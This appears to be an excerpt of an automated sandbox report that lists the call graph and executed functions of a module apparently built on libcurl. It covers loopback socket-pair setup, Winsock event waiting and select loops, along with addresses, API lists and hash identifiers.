21084 6b7737b7 21082->21084 21085 6b77377c WSAGetLastError 21082->21085 21087 6b77372f 21083->21087 21086 6b772840 23 API calls 21084->21086 21088 6b7aa0e0 53 API calls 21085->21088 21090 6b7737d7 21086->21090 21091 6b7bdb71 __fassign 5 API calls 21087->21091 21089 6b773796 21088->21089 21092 6b7a05d0 74 API calls 21089->21092 21093 6b773820 21090->21093 21094 6b7737de 21090->21094 21095 6b77373f 21091->21095 21096 6b7737a3 21092->21096 21097 6b772840 23 API calls 21093->21097 21098 6b7c1f49 __dosmaperr 14 API calls 21094->21098 21095->20532 21099 6b7bdb71 __fassign 5 API calls 21096->21099 21100 6b773876 21097->21100 21101 6b7737e3 21098->21101 21102 6b7737b3 21099->21102 21100->21073 21103 6b77387d 21100->21103 21104 6b7c1f49 __dosmaperr 14 API calls 21101->21104 21102->20532 21105 6b7c1f49 __dosmaperr 14 API calls 21103->21105 21106 6b7737ea 21104->21106 21107 6b773882 21105->21107 21108 6b7aa0e0 53 API calls 21106->21108 21109 6b7c1f49 __dosmaperr 14 API calls 21107->21109 21110 6b7737fe 21108->21110 21111 6b773889 21109->21111 21112 6b7a05d0 74 API calls 21110->21112 21114 6b7aa0e0 53 API calls 21111->21114 21113 6b77380c 21112->21113 21115 6b7bdb71 __fassign 5 API calls 21113->21115 21116 6b77389d 21114->21116 21117 6b77381c 21115->21117 21118 6b7a05d0 74 API calls 21116->21118 21117->20532 21119 6b7738ab 21118->21119 21120 6b7bdb71 __fassign 5 API calls 21119->21120 21121 6b7738bb 21120->21121 21121->20532 21123 6b7ae5d0 2 API calls 21122->21123 21124 6b79cc35 21123->21124 21124->20528 21126 6b7828b1 21125->21126 21128 6b773214 21125->21128 21127 6b7a06b0 74 API calls 21126->21127 21127->21128 21128->20498 21211 6b7884a0 21212 6b7884e7 21211->21212 21213 6b788840 77 API calls 21212->21213 21214 6b7884ff 21213->21214 21215 6b7a06b0 74 API calls 21214->21215 21231 6b788515 21214->21231 21215->21231 21216 6b788589 inet_pton 21218 6b7885b9 inet_pton 21216->21218 21219 6b78859a 21216->21219 21217 6b7bdb71 __fassign 5 API calls 21220 6b788679 21217->21220 21222 6b7885ca 21218->21222 21226 6b7885d9 21218->21226 21221 6b776fb0 htons 21219->21221 21224 6b7885a9 21221->21224 21223 6b776fb0 htons 21222->21223 21223->21226 21224->21218 21225 6b78867d 21224->21225 21228 6b787ae0 78 API calls 21225->21228 21226->21225 21227 6b7886cf 21226->21227 21233 6b79db40 147 API calls 21226->21233 21234 6b788617 21226->21234 21229 6b7bdb71 __fassign 5 API calls 21227->21229 21230 6b788656 21228->21230 21232 6b7886df 21229->21232 21230->21217 21231->21216 21231->21227 21231->21230 21233->21234 21234->21225 21235 6b788630 21234->21235 21235->21230 21236 6b78864a 21235->21236 21237 6b788643 21235->21237 21239 6b771380 90 API calls 21236->21239 21238 6b79dcd0 112 API calls 21237->21238 21240 6b788648 21238->21240 21239->21240 21240->21227 21240->21230 21295 6b7a0c20 21296 6b7a09f0 94 API calls 21295->21296 21297 6b7a0c45 21296->21297 19152 6b797990 19153 6b7979b4 19152->19153 19158 6b79799f 19152->19158 19154 6b797a25 19188 6b771e00 19154->19188 19156 6b797a2f 19159 6b797a5d WSACloseEvent 19156->19159 19158->19153 19158->19154 19161 6b7983d0 19158->19161 19160 6b797a73 19159->19160 19162 6b7983ff 19161->19162 19163 6b798533 19161->19163 19196 6b7714e0 19162->19196 19164 6b7bdb71 __fassign 5 API calls 19163->19164 19166 6b798560 19164->19166 19166->19158 19169 6b7984e1 19169->19163 19170 6b798564 19169->19170 19215 6b787df0 19170->19215 19171 6b798473 19171->19169 19233 6b7969d0 19171->19233 19174 6b798595 19176 6b79863f curl_msnprintf 19174->19176 19179 6b7986e9 19174->19179 19177 6b7986a1 19176->19177 19243 6b7724b0 19177->19243 19254 6b781bd0 19179->19254 19181 6b7986b3 19182 6b7986d8 19181->19182 19183 6b7a06b0 74 API calls 19181->19183 19184 6b781ce0 106 API calls 19182->19184 19183->19182 19185 6b798743 19184->19185 19186 6b7bdb71 __fassign 5 API calls 19185->19186 19187 6b798755 19186->19187 19187->19158 19189 6b771fcc 19188->19189 19195 6b771e2b 19188->19195 19190 6b7bdb71 __fassign 5 API calls 19189->19190 19191 6b771fda 19190->19191 19191->19156 19192 6b771f9d 19192->19189 19193 6b781650 106 API calls 19192->19193 19193->19189 19194 6b781bd0 83 API calls 19194->19195 19195->19192 19195->19194 19197 6b771506 19196->19197 19198 6b7714f1 19196->19198 19200 6b7715d0 EnterCriticalSection LeaveCriticalSection 19197->19200 19201 6b771649 19197->19201 19198->19197 19199 6b7714f6 19198->19199 19268 6b779160 WaitForSingleObjectEx CloseHandle 19199->19268 19204 6b7715fd 19200->19204 19205 6b771609 19200->19205 19201->19171 19221 6b79c6d0 19201->19221 19203 6b7714fc 19203->19197 19269 6b779150 CloseHandle 19204->19269 19206 6b771617 19205->19206 19207 6b77160e 19205->19207 19211 6b771670 2 API calls 19206->19211 19270 6b779160 WaitForSingleObjectEx CloseHandle 19207->19270 19209 6b771604 19212 6b771620 19209->19212 19211->19212 19214 6b771641 closesocket 19212->19214 19213 6b771614 19213->19206 19214->19201 19216 6b787e0d 19215->19216 19220 6b787e32 19215->19220 19216->19220 19271 6b7c6edc 19216->19271 19217 6b7bdb71 __fassign 5 API calls 19218 6b787e7a 19217->19218 19218->19174 19220->19217 19222 6b7ae5d0 2 API calls 19221->19222 19223 6b79c6fd 19222->19223 19287 6b79d1f0 19223->19287 19225 6b79c830 19226 6b79c837 19225->19226 19227 6b79c865 curl_mfprintf 19225->19227 19226->19171 19227->19226 19228 6b79c840 19228->19225 19292 6b79d510 19228->19292 19230 6b79c821 19230->19225 19232 6b7a05d0 74 API calls 19230->19232 19231 6b79c70e 19231->19225 19231->19228 19231->19230 19232->19225 19234 6b796bc3 19233->19234 19235 6b7969ea 19233->19235 19234->19169 19236 6b7ae5d0 2 API calls 19235->19236 19238 6b7969f3 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 19236->19238 19238->19234 19239 6b7a9660 5 API calls 19238->19239 19242 6b796b8c 19238->19242 19240 6b796b79 19239->19240 19241 6b7a06b0 74 API calls 19240->19241 19240->19242 19241->19242 19502 6b7a9540 19242->19502 19244 6b7724c9 19243->19244 19245 6b7ae5d0 2 API calls 19244->19245 19247 6b7724d8 19245->19247 19246 6b772680 19246->19181 19247->19246 19248 6b7a06b0 74 API calls 19247->19248 19249 6b772538 19248->19249 19250 6b7ae5d0 2 API calls 19249->19250 19252 6b77255a 19250->19252 19251 6b781bd0 83 API calls 19253 6b772670 19251->19253 19252->19246 19252->19251 19253->19181 19256 6b781be4 19254->19256 19255 6b781cc7 19255->19182 19256->19255 19257 6b7a06b0 74 API calls 19256->19257 19258 6b781c5c 19257->19258 19507 6b771000 19258->19507 19260 6b781c62 19261 6b781c88 19260->19261 19262 6b7728e0 closesocket 19260->19262 19263 6b781c9d 19261->19263 19264 6b7728e0 closesocket 19261->19264 19262->19261 19265 6b781cb2 19263->19265 19266 6b7728e0 closesocket 19263->19266 19264->19263 19265->19255 19267 6b7728e0 closesocket 19265->19267 19266->19265 19267->19255 19268->19203 19269->19209 19270->19213 19274 6b7c6e59 19271->19274 19273 6b7c6ef9 19273->19220 19275 6b7c6e68 19274->19275 19277 6b7c6e7d 19274->19277 19276 6b7c1f49 __dosmaperr 14 API calls 19275->19276 19278 6b7c6e6d 19276->19278 19281 6b7c6e78 __alldvrm 19277->19281 19282 6b7cfbd1 19277->19282 19280 6b7cf18d __fassign 25 API calls 19278->19280 19280->19281 19281->19273 19283 6b7cf953 __dosmaperr 5 API calls 19282->19283 19284 6b7cfbed 19283->19284 19285 6b7cfc08 GetSystemTimeAsFileTime 19284->19285 19286 6b7cfbf6 19284->19286 19286->19281 19288 6b79d24a __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 19287->19288 19289 6b79d4ad __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 19288->19289 19319 6b7be06f 19288->19319 19289->19231 19291 6b79d497 19291->19231 19293 6b79d56b __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 19292->19293 19294 6b79d590 curl_mfprintf 19293->19294 19295 6b79d5a5 curl_mfprintf 19293->19295 19297 6b79d5c8 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 19293->19297 19294->19295 19295->19297 19385 6b79d9d0 19297->19385 19298 6b79d7ef 19299 6b79d9d0 3 API calls 19298->19299 19300 6b79d7fa 19299->19300 19301 6b79d9d0 3 API calls 19300->19301 19305 6b79d80c __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 19301->19305 19303 6b79d8fe 19304 6b79d000 8 API calls 19303->19304 19306 6b79d923 19304->19306 19394 6b79d000 19305->19394 19307 6b79d000 8 API calls 19306->19307 19308 6b79d93c 19307->19308 19309 6b79d000 8 API calls 19308->19309 19310 6b79d955 19309->19310 19311 6b79d000 8 API calls 19310->19311 19312 6b79d974 19311->19312 19313 6b79d000 8 API calls 19312->19313 19314 6b79d989 curl_mfprintf 19313->19314 19417 6b7caec7 19314->19417 19320 6b7bdffb 19319->19320 19321 6b7be099 19319->19321 19322 6b7be00d 20 API calls 19320->19322 19323 6b7bdeb3 19321->19323 19324 6b7be0a2 19321->19324 19326 6b7be005 19322->19326 19325 6b7bded0 19323->19325 19351 6b7be00d 19323->19351 19327 6b7be0d9 19324->19327 19328 6b7be0c3 19324->19328 19344 6b7be0d7 19324->19344 19325->19320 19343 6b7bdeec 19325->19343 19326->19291 19332 6b7be00d 20 API calls 19327->19332 19331 6b7be00d 20 API calls 19328->19331 19329 6b7be0fb 19337 6b7be00d 20 API calls 19329->19337 19345 6b7bdf39 19329->19345 19330 6b7be122 19339 6b7be00d 20 API calls 19330->19339 19340 6b7be15d 19330->19340 19334 6b7be0cd 19331->19334 19336 6b7be0e3 19332->19336 19338 6b7be00d 20 API calls 19334->19338 19335 6b7bdfed 19335->19291 19341 6b7be00d 20 API calls 19336->19341 19342 6b7be113 19337->19342 19338->19344 19339->19340 19340->19320 19340->19345 19341->19344 19346 6b7be00d 20 API calls 19342->19346 19343->19345 19347 6b7bdf27 19343->19347 19344->19329 19344->19330 19345->19335 19348 6b7be00d 20 API calls 19345->19348 19346->19345 19349 6b7be00d 20 API calls 19347->19349 19348->19335 19350 6b7bdf31 19349->19350 19350->19291 19352 6b7be01d 19351->19352 19353 6b7be04b 19352->19353 19355 6b7cba14 19352->19355 19353->19325 19356 6b7cba4d 19355->19356 19358 6b7cba74 19356->19358 19366 6b7cbcf0 19356->19366 19359 6b7cbab7 19358->19359 19360 6b7cba92 19358->19360 19378 6b7cbfe6 19359->19378 19370 6b7cc015 19360->19370 19363 6b7cbab2 19364 6b7bdb71 __fassign 5 API calls 19363->19364 19365 6b7cbadb 19364->19365 19365->19353 19367 6b7cbd1b 19366->19367 19368 6b7cbf14 RaiseException 19367->19368 19369 6b7cbf2d 19368->19369 19369->19358 19371 6b7cc024 19370->19371 19372 6b7cc098 19371->19372 19375 6b7cc043 19371->19375 19373 6b7cbfe6 14 API calls 19372->19373 19374 6b7cc0ad 19373->19374 19374->19363 19376 6b7cc091 19375->19376 19377 6b7cbfe6 14 API calls 19375->19377 19376->19363 19377->19376 19379 6b7cc008 19378->19379 19380 6b7cbff3 19378->19380 19382 6b7c1f49 __dosmaperr 14 API calls 19379->19382 19381 6b7cc00d 19380->19381 19383 6b7c1f49 __dosmaperr 14 API calls 19380->19383 19381->19363 19382->19381 19384 6b7cc000 19383->19384 19384->19363 19387 6b79d9e2 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 19385->19387 19386 6b79d9e8 19386->19298 19387->19386 19388 6b79dab4 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 19387->19388 19390 6b79da31 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 19387->19390 19389 6b79db16 curl_msnprintf 19388->19389 19392 6b79dad7 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 19388->19392 19389->19298 19391 6b79da52 curl_msnprintf 19390->19391 19391->19298 19393 6b79daf7 curl_msnprintf 19392->19393 19393->19298 19395 6b79d0c8 19394->19395 19396 6b79d013 19394->19396 19397 6b79d100 19395->19397 19400 6b79d0d7 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 19395->19400 19398 6b79d01d curl_msnprintf 19396->19398 19399 6b79d038 19396->19399 19401 6b79d152 19397->19401 19403 6b79d10b __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 19397->19403 19398->19303 19399->19395 19404 6b79d04a __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 19399->19404 19410 6b79d073 19399->19410 19406 6b79d0e5 curl_msnprintf 19400->19406 19402 6b79d189 19401->19402 19405 6b79d160 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 19401->19405 19407 6b79d1c0 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 19402->19407 19411 6b79d197 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 19402->19411 19414 6b79d137 curl_msnprintf 19403->19414 19408 6b79d058 curl_msnprintf 19404->19408 19409 6b79d16e curl_msnprintf 19405->19409 19406->19303 19412 6b79d1ce curl_msnprintf 19407->19412 19408->19303 19409->19303 19410->19395 19415 6b79d081 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 19410->19415 19413 6b79d1a5 curl_msnprintf 19411->19413 19412->19303 19413->19303 19414->19303 19416 6b79d0ad curl_msnprintf 19415->19416 19416->19303 19418 6b7caed9 19417->19418 19421 6b7caee2 19417->19421 19503 6b7a9637 19502->19503 19504 6b7a9554 19502->19504 19503->19234 19504->19503 19505 6b7a9340 5 API calls 19504->19505 19506 6b7a956e 19505->19506 19506->19234 19508 6b7715c0 19507->19508 19509 6b7715d0 EnterCriticalSection LeaveCriticalSection 19508->19509 19510 6b771649 19508->19510 19511 6b7715fd 19509->19511 19512 6b771609 19509->19512 19510->19260 19522 6b779150 CloseHandle 19511->19522 19513 6b771617 19512->19513 19514 6b77160e 19512->19514 19518 6b771670 2 API calls 19513->19518 19523 6b779160 WaitForSingleObjectEx CloseHandle 19514->19523 19516 6b771604 19520 6b771620 19516->19520 19518->19520 19519 6b771614 19519->19513 19521 6b771641 closesocket 19520->19521 19521->19510 19522->19516 19523->19519 19524 6b7cf692 GetLastError 19525 6b7cf6a9 19524->19525 19528 6b7cf6af 19524->19528 19526 6b7cfb50 __dosmaperr 6 API calls 19525->19526 19526->19528 19527 6b7cfb8f __dosmaperr 6 API calls 19529 6b7cf6cd 19527->19529 19528->19527 19545 6b7cf6b5 SetLastError 19528->19545 19530 6b7cf78d __dosmaperr 12 API calls 19529->19530 19529->19545 19531 6b7cf6dd 19530->19531 19533 6b7cf6fc 19531->19533 19534 6b7cf6e5 19531->19534 19536 6b7cfb8f __dosmaperr 6 API calls 19533->19536 19535 6b7cfb8f __dosmaperr 6 API calls 19534->19535 19537 6b7cf6f3 19535->19537 19538 6b7cf708 19536->19538 19541 6b7cf7ea _free 12 API calls 19537->19541 19539 6b7cf70c 19538->19539 19540 6b7cf71d 19538->19540 19542 6b7cfb8f __dosmaperr 6 API calls 19539->19542 19543 6b7cf33d __dosmaperr 12 API calls 19540->19543 19541->19545 19542->19537 19544 6b7cf728 19543->19544 19546 6b7cf7ea _free 12 API calls 19544->19546 19546->19545 21196 6b77a080 21197 6b77a097 21196->21197 21198 6b77a09e 21197->21198 21201 6b77a230 21197->21201 21200 6b77a0b6 21202 6b77a241 21201->21202 21203 6b77a23b 21201->21203 21204 6b77a24a 21202->21204 21207 6b77a260 21202->21207 21203->21200 21205 6b7a05d0 74 API calls 21204->21205 21206 6b77a255 21205->21206 21206->21200 21208 6b77a28c 21207->21208 21209 6b7a05d0 74 API calls 21207->21209 21208->21200 21210 6b77a281 21209->21210 21210->21200 21241 6b797e80 21244 6b796ef0 21241->21244 21243 6b797e9b 21245 6b79747b 21244->21245 21246 6b796f24 21244->21246 21247 6b7bdb71 __fassign 5 API calls 21245->21247 21246->21245 21248 6b796f30 21246->21248 21249 6b79748c 21247->21249 21250 6b796f38 21248->21250 21251 6b796f4b 21248->21251 21249->21243 21252 6b7bdb71 __fassign 5 API calls 21250->21252 21253 6b796f53 21251->21253 21258 6b796f69 21251->21258 21254 6b796f47 21252->21254 21255 6b7bdb71 __fassign 5 API calls 21253->21255 21254->21243 21257 6b796f65 21255->21257 21257->21243 21288 6b799c30 21258->21288 21259 6b7971fa 21260 6b79720e WSAWaitForMultipleEvents 21259->21260 21266 6b7973fc 21259->21266 21268 6b79722e 21260->21268 21285 6b7972eb 21260->21285 21261 6b7973ed WSAResetEvent 21261->21266 21262 6b797231 WSAEnumNetworkEvents 21264 6b7972c2 WSAEventSelect 21262->21264 21262->21268 21263 6b797452 21265 6b7bdb71 __fassign 5 API calls 21263->21265 21264->21262 21264->21285 21269 6b797461 21265->21269 21266->21263 21272 6b799c30 7 API calls 21266->21272 21267 6b79fef0 14 API calls 21278 6b7970e1 21267->21278 21268->21262 21268->21264 21269->21243 21270 6b7a03a0 16 API calls 21271 6b796fd6 21270->21271 21271->21270 21274 6b7970ab WSAEventSelect 21271->21274 21271->21278 21281 6b79742f 21272->21281 21273 6b7971cb WSAEventSelect 21275 6b797465 21273->21275 21273->21278 21274->21271 21274->21275 21277 6b7bdb71 __fassign 5 API calls 21275->21277 21276 6b797337 WSAEnumNetworkEvents 21276->21285 21280 6b797477 21277->21280 21278->21259 21278->21267 21278->21273 21279 6b7973ea 21279->21261 21280->21243 21281->21263 21282 6b797445 21281->21282 21284 6b7a04d0 2 API calls 21282->21284 21283 6b7973b6 WSAEventSelect 21283->21285 21286 6b79744f 21284->21286 21285->21261 21285->21276 21285->21279 21285->21283 21287 6b7a03a0 16 API calls 21285->21287 21286->21263 21287->21285 21289 6b799c49 21288->21289 21290 6b799d12 21288->21290 21291 6b7ae5d0 2 API calls 21289->21291 21290->21271 21292 6b799c52 21291->21292 21293 6b7a9340 5 API calls 21292->21293 21294 6b799c77 21293->21294 21294->21271

                                                                                                                                            Executed Functions

                                                                                                                                            Function 6B7A6D50 Relevance: 24.2, APIs: 16, Instructions: 171networkCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 134 6b7a6d50-6b7a6d87 socket 135 6b7a6d8d-6b7a6dd6 htonl setsockopt 134->135 136 6b7a6f21-6b7a6f34 call 6b7bdb71 134->136 137 6b7a6f0f-6b7a6f1f closesocket * 3 135->137 138 6b7a6ddc-6b7a6dec bind 135->138 137->136 138->137 140 6b7a6df2-6b7a6e04 getsockname 138->140 140->137 142 6b7a6e0a-6b7a6e16 listen 140->142 142->137 143 6b7a6e1c-6b7a6e29 socket 142->143 143->137 144 6b7a6e2f-6b7a6e3f connect 143->144 144->137 145 6b7a6e45-6b7a6e56 accept 144->145 145->137 146 6b7a6e5c-6b7a6e73 curl_msnprintf 145->146 147 6b7a6e76-6b7a6e7b 146->147 147->147 148 6b7a6e7d-6b7a6e90 send 147->148 148->137 149 6b7a6e92-6b7a6ea5 recv 148->149 149->137 150 6b7a6ea7-6b7a6eb0 149->150 151 6b7a6eb2-6b7a6eb6 150->151 152 6b7a6ec3-6b7a6ec6 150->152 153 6b7a6ec8-6b7a6ecc 151->153 154 6b7a6eb8-6b7a6ec1 151->154 152->153 155 6b7a6ef5-6b7a6f0e closesocket call 6b7bdb71 152->155 153->137 157 6b7a6ece-6b7a6ed1 153->157 154->151 154->152 157->155 158 6b7a6ed3-6b7a6ed9 157->158 158->137 160 6b7a6edb-6b7a6ede 158->160 160->155 161 6b7a6ee0-6b7a6ee6 160->161 161->137 162 6b7a6ee8-6b7a6eeb 161->162 162->155 163 6b7a6eed-6b7a6ef3 162->163 163->137 163->155
                                                                                                                                            APIs
                                                                                                                                            • socket.WS2_32(00000002,00000001,00000006), ref: 6B7A6D80
                                                                                                                                            • htonl.WS2_32(7F000001), ref: 6B7A6DA3
                                                                                                                                            • setsockopt.WS2_32(00000000,0000FFFF,00000004,00000001,00000004), ref: 6B7A6DCD
                                                                                                                                            • bind.WS2_32(00000000,?,00000010), ref: 6B7A6DE3
                                                                                                                                            • getsockname.WS2_32(00000000,?,00000010), ref: 6B7A6DFB
                                                                                                                                            • listen.WS2_32(00000000,00000001), ref: 6B7A6E0D
                                                                                                                                            • socket.WS2_32(00000002,00000001,00000000), ref: 6B7A6E22
                                                                                                                                            • connect.WS2_32(00000000,?,00000010), ref: 6B7A6E36
                                                                                                                                            • accept.WS2_32(00000000,00000000,00000000), ref: 6B7A6E4A
                                                                                                                                            • curl_msnprintf.LIBCURL(?,0000000C,6B7E0CA0,6B771172), ref: 6B7A6E68
                                                                                                                                            • send.WS2_32(6B771172,?,?,00000000), ref: 6B7A6E88
                                                                                                                                            • recv.WS2_32(C74C79C0,00000001,0000000C,00000000), ref: 6B7A6E9D
                                                                                                                                            • closesocket.WS2_32(00000000), ref: 6B7A6EF6
                                                                                                                                            • closesocket.WS2_32(00000000), ref: 6B7A6F16
                                                                                                                                            • closesocket.WS2_32(6B771172), ref: 6B7A6F1A
                                                                                                                                            • closesocket.WS2_32(C74C79C0), ref: 6B7A6F1F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: closesocket$socket$acceptbindconnectcurl_msnprintfgetsocknamehtonllistenrecvsendsetsockopt
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4135244658-0
                                                                                                                                            • Opcode ID: 1a60fc938942f649a2f120fe06661343110e42da25748655be1865dc8299818c
                                                                                                                                            • Instruction ID: f73a00944b0003e2d1f63e2ab8d13696e8e276e0718e7f30d42ccfccf7b7f448
                                                                                                                                            • Opcode Fuzzy Hash: 1a60fc938942f649a2f120fe06661343110e42da25748655be1865dc8299818c
                                                                                                                                            • Instruction Fuzzy Hash: BD51E432904108ABDB10DF7CCD85BADBB75AF06730F1043A5F975AA1D0E774EA468B60
                                                                                                                                            Function 6B79FEF0 Relevance: 15.3, APIs: 10, Instructions: 347networksleepCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 164 6b79fef0-6b79ff0e 165 6b79ff2b-6b79ff35 164->165 166 6b79ff10-6b79ff17 164->166 168 6b79ff3b-6b79ff3d 165->168 169 6b7a0384-6b7a0393 call 6b7bdb71 165->169 166->165 167 6b79ff19 166->167 170 6b79ff20-6b79ff24 167->170 171 6b7a036e-6b7a0373 168->171 172 6b79ff43 168->172 174 6b79ff69-6b79ff98 170->174 175 6b79ff26-6b79ff29 170->175 178 6b7a037d-6b7a037e Sleep 171->178 176 6b79ff4d-6b79ff68 WSASetLastError call 6b7bdb71 172->176 177 6b79ff45-6b79ff47 172->177 182 6b79ffa0-6b79ffbf 174->182 175->165 175->170 177->176 180 6b7a0363-6b7a0365 177->180 178->169 180->178 183 6b7a0367 180->183 185 6b79ffc5 182->185 186 6b7a00c4-6b7a00d3 182->186 183->171 187 6b7a0369-6b7a036c 183->187 189 6b79ffcb-6b79ffed 185->189 190 6b7a0100-6b7a010b WSASetLastError 185->190 186->182 188 6b7a00d9-6b7a00db 186->188 187->171 187->178 194 6b7a00e1-6b7a00e3 188->194 195 6b7a0164-6b7a0178 188->195 191 6b79fff3-6b7a000d 189->191 192 6b7a00c1 189->192 193 6b7a010e-6b7a011e call 6b7bdb71 190->193 196 6b7a000f-6b7a0013 191->196 197 6b7a0046-6b7a0048 191->197 192->186 194->195 199 6b7a00e5-6b7a00e7 194->199 200 6b7a017a 195->200 201 6b7a01a1-6b7a01e1 call 6b7bdb90 call 6b7be290 * 2 195->201 202 6b7a0023-6b7a0025 196->202 203 6b7a0015-6b7a001c 196->203 206 6b7a004a-6b7a004e 197->206 207 6b7a0081-6b7a0086 197->207 199->195 208 6b7a00e9-6b7a00f9 199->208 209 6b7a017c-6b7a017e 200->209 210 6b7a0180-6b7a018a 200->210 257 6b7a020f 201->257 258 6b7a01e3 201->258 215 6b7a0040 202->215 216 6b7a0027-6b7a002a 202->216 203->202 214 6b7a001e-6b7a0021 203->214 218 6b7a005e-6b7a0060 206->218 219 6b7a0050-6b7a0057 206->219 207->192 212 6b7a0088-6b7a008c 207->212 220 6b7a00fb 208->220 221 6b7a011f-6b7a0121 208->221 209->210 211 6b7a018f-6b7a0191 209->211 213 6b7a0237-6b7a0271 select 210->213 223 6b7a0223-6b7a022d 211->223 224 6b7a0197 211->224 225 6b7a009e-6b7a00a0 212->225 226 6b7a008e 212->226 222 6b7a0277-6b7a0279 213->222 214->202 214->203 215->197 216->215 229 6b7a002c-6b7a003a 216->229 232 6b7a007b 218->232 233 6b7a0062-6b7a0065 218->233 219->218 231 6b7a0059-6b7a005c 219->231 220->222 227 6b7a0123 221->227 228 6b7a0147-6b7a014c 221->228 222->193 234 6b7a027f-6b7a028a 222->234 223->213 224->201 235 6b7a0199-6b7a019b 224->235 237 6b7a00bb 225->237 238 6b7a00a2-6b7a00a5 225->238 236 6b7a0090-6b7a0097 226->236 239 6b7a0129-6b7a0137 WSASetLastError 227->239 240 6b7a0125-6b7a0127 227->240 242 6b7a0156-6b7a015f Sleep 228->242 229->215 231->218 231->219 232->207 233->232 243 6b7a0067-6b7a0075 233->243 244 6b7a0290-6b7a029b 234->244 235->201 235->223 236->225 245 6b7a0099-6b7a009c 236->245 237->192 238->237 246 6b7a00a7-6b7a00b5 238->246 239->222 240->239 247 6b7a013c-6b7a013e 240->247 242->222 243->232 249 6b7a0343-6b7a034a 244->249 250 6b7a02a1-6b7a02b0 __WSAFDIsSet 244->250 245->225 245->236 246->237 247->242 251 6b7a0140 247->251 249->244 253 6b7a0350-6b7a0362 call 6b7bdb71 249->253 254 6b7a02df-6b7a02f0 __WSAFDIsSet 250->254 255 6b7a02b2-6b7a02bf 250->255 251->228 256 6b7a0142-6b7a0145 251->256 262 6b7a02fc-6b7a030d __WSAFDIsSet 254->262 263 6b7a02f2-6b7a02f6 254->263 260 6b7a02cc-6b7a02d5 255->260 261 6b7a02c1-6b7a02c9 255->261 256->228 256->242 266 6b7a0215-6b7a0221 257->266 264 6b7a01f2-6b7a020d 258->264 265 6b7a01e5-6b7a01f0 258->265 260->254 268 6b7a02d7-6b7a02dc 260->268 261->260 270 6b7a030f-6b7a031c 262->270 271 6b7a033c-6b7a0340 262->271 263->262 269 6b7a02f8 263->269 264->213 265->264 265->266 266->213 268->254 269->262 273 6b7a0329-6b7a0332 270->273 274 6b7a031e-6b7a0326 270->274 271->249 272 6b7a0342 271->272 272->249 273->271 275 6b7a0334-6b7a0339 273->275 274->273 275->271
                                                                                                                                            APIs
                                                                                                                                            • WSASetLastError.WS2_32(00002726), ref: 6B79FF52
                                                                                                                                            • WSASetLastError.WS2_32(00002726,00000000,00000001,000000FF), ref: 6B7A0105
                                                                                                                                            • WSASetLastError.WS2_32(00002726,00000000,00000001,000000FF), ref: 6B7A012E
                                                                                                                                            • Sleep.KERNEL32(FFFFFFFE,00000000,00000001,000000FF), ref: 6B7A0157
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B7A01AA
                                                                                                                                            • select.WS2_32(?,?,?,?,?), ref: 6B7A0271
                                                                                                                                            • __WSAFDIsSet.WS2_32(?,?), ref: 6B7A02A9
                                                                                                                                            • __WSAFDIsSet.WS2_32(?,?), ref: 6B7A02E9
                                                                                                                                            • __WSAFDIsSet.WS2_32(?,?), ref: 6B7A0306
                                                                                                                                            • Sleep.KERNEL32(FFFFFFFE), ref: 6B7A037E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast$Sleep$Unothrow_t@std@@@__ehfuncinfo$??2@select
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1691268743-0
